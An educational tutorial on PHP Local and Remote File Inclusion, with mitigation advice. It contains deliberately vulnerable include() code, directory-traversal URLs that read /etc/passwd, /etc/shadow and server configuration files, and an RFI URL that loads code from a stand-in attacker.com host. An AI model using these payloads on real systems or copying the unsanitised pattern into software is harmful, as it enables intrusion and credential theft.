🗃️LFI / RFI

Introduction

Local File Inclusion (LFI) and Remote File Inclusion (RFI) are two common web application vulnerabilities that allow attackers to include arbitrary files on a vulnerable web server. These vulnerabilities can be exploited to gain unauthorized access to sensitive information, execute malicious code, and take control of the vulnerable system.

In this course, we will cover the basics of LFI/RFI vulnerabilities and how to exploit them with practical examples.

Prerequisites

• Basic knowledge of web application architecture

• Understanding of web application security concepts

What is LFI/RFI?

LFI is a type of vulnerability that allows an attacker to include local files on a web server. This can be used to read sensitive files such as configuration files, user credentials, and system files. LFI occurs when a web application does not properly sanitize user input and allows the attacker to specify a file path to be included.

RFI is a type of vulnerability that allows an attacker to include remote files on a web server. This can be used to execute arbitrary code on the server, download and execute malware, or access sensitive information on remote servers. RFI occurs when a web application allows the attacker to specify a URL to a remote file that is then included on the server.

Exploiting LFI/RFI vulnerabilities

Exploiting LFI

Let's consider the following PHP code:

<?php
    $file = $_GET['file'];
    include($file);
?>

This code includes a file specified in the file parameter in the URL. If the parameter is not properly sanitized, an attacker can exploit this vulnerability by providing a path to a sensitive file on the server. For example, the following URL can be used to read the /etc/passwd file:

http://example.com/index.php?file=../../../../etc/passwd

In this example, the ../ characters are used to traverse up the directory structure until the root directory is reached, and then the /etc/passwd file is included.

Exploiting RFI

Let's consider the following PHP code:

<?php
    $url = $_GET['url'];
    include($url);
?>

This code includes a remote file specified in the url parameter in the URL. If the parameter is not properly sanitized, an attacker can exploit this vulnerability by providing a URL to a remote file that is then included on the server. For example, the following URL can be used to execute arbitrary code on the server:

http://example.com/index.php?url=http://attacker.com/malicious-code.php

In this example, the malicious-code.php file hosted on the attacker's server is included on the vulnerable server and executed.

Mitigating LFI/RFI vulnerabilities

LFI/RFI vulnerabilities can be mitigated by properly sanitizing user input and limiting the file inclusion to a specific directory or a list of allowed files.

Sanitizing user input

All user input, especially those used in file inclusion, should be sanitized to remove any special characters or directory traversal characters. Input validation should also be used to restrict the inclusion to specific directories and files.

Limiting file inclusion

File inclusion should be limited to a specific directory or a list of allowed files. This can be done by checking the requested file against a list of allowed files or by restricting the inclusion to a specific directory.

Useful LFI examples

1. Reading sensitive files:

http://example.com/index.php?page=../../../etc/passwd

This example tries to include the /etc/passwd file by traversing up the directory structure using ../ characters.

1. Reading PHP configuration file:

http://example.com/index.php?page=../../../../etc/php.ini

This example tries to include the php.ini configuration file by traversing up the directory structure using ../ characters.

1. Reading Apache configuration file:

http://example.com/index.php?page=../../../../etc/apache2/apache2.conf

This example tries to include the apache2.conf configuration file by traversing up the directory structure using ../ characters.

1. Reading log files:

http://example.com/index.php?page=../../../var/log/apache2/access.log

This example tries to include the access.log file by traversing up the directory structure using ../ characters.

1. Reading SSH configuration file:

http://example.com/index.php?page=../../../../etc/ssh/sshd_config

This example tries to include the sshd_config configuration file by traversing up the directory structure using ../ characters.

1. Reading system files:

http://example.com/index.php?page=../../../etc/shadow

This example tries to include the shadow file that contains sensitive information about user passwords by traversing up the directory structure using ../ characters.

It is important to note that these examples should only be used for educational or testing purposes on systems that you have permission to access. It is illegal to attempt to exploit LFI vulnerabilities on systems without permission.

Conclusion

LFI/RFI vulnerabilities are common web application vulnerabilities that can be exploited to gain unauthorized access to sensitive information, execute malicious code, and take control of the vulnerable system. In this course, we covered the basics of LFI/RFI vulnerabilities and how to exploit them with practical examples. We also discussed how to mitigate these vulnerabilities by properly sanitizing user input and limiting the file inclusion to a specific directory or a list of allowed files.

As a cybersecurity expert, it is important to understand and identify these vulnerabilities in web applications and take appropriate measures to secure them. By implementing best practices in web application security, we can reduce the risk of LFI/RFI vulnerabilities and protect our systems and sensitive data.